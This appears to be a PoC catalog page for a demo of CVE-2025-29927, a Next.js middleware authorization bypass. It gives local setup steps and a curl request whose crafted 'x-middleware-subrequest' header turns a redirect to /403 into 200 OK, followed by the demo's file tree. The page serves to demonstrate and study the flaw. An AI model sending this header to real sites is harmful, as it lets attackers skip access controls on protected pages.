来源

关联漏洞

描述

Demo for Next.js middleware bypass - CVE-2025-29927

介绍

# CVE-2025-29927 Demo

Original writeup: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

## Setup

First, run the development server:

```bash
npm i
npm run dev
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.

## Trying out the bypass

`curl -I http://localhost:3000`

```http
HTTP/1.1 307 Temporary Redirect
location: /403
Date: Mon, 24 Mar 2025 08:02:50 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```

`curl -I -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000`

```http
HTTP/1.1 200 OK
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
link: </_next/static/media/569ce4b8f30dc480-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/media/93f479601ee12b01-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/css/app/layout.css?v=1742803407039>; rel=preload; as="style"
Cache-Control: no-store, must-revalidate
X-Powered-By: Next.js
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Mar 2025 08:03:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```

文件快照

 [4.0K]  /data/pocs/cf26b64aa90d787a4a95449422d116596e27cfb3
├── [ 393]  eslint.config.mjs
├── [1.0K]  LICENSE
├── [ 133]  next.config.ts
├── [ 568]  package.json
├── [323K]  package-lock.json
├── [  81]  postcss.config.mjs
├── [4.0K]  public
│   ├── [ 391]  file.svg
│   ├── [1.0K]  globe.svg
│   ├── [1.3K]  next.svg
│   ├── [ 128]  vercel.svg
│   └── [ 385]  window.svg
├── [1.2K]  README.md
├── [4.0K]  src
│   ├── [4.0K]  app
│   │   ├── [4.0K]  403
│   │   │   └── [ 640]  page.tsx
│   │   ├── [ 25K]  favicon.ico
│   │   ├── [ 488]  globals.css
│   │   ├── [ 689]  layout.tsx
│   │   └── [ 433]  page.tsx
│   └── [ 662]  middleware.ts
└── [ 602]  tsconfig.json

4 directories, 19 files

备注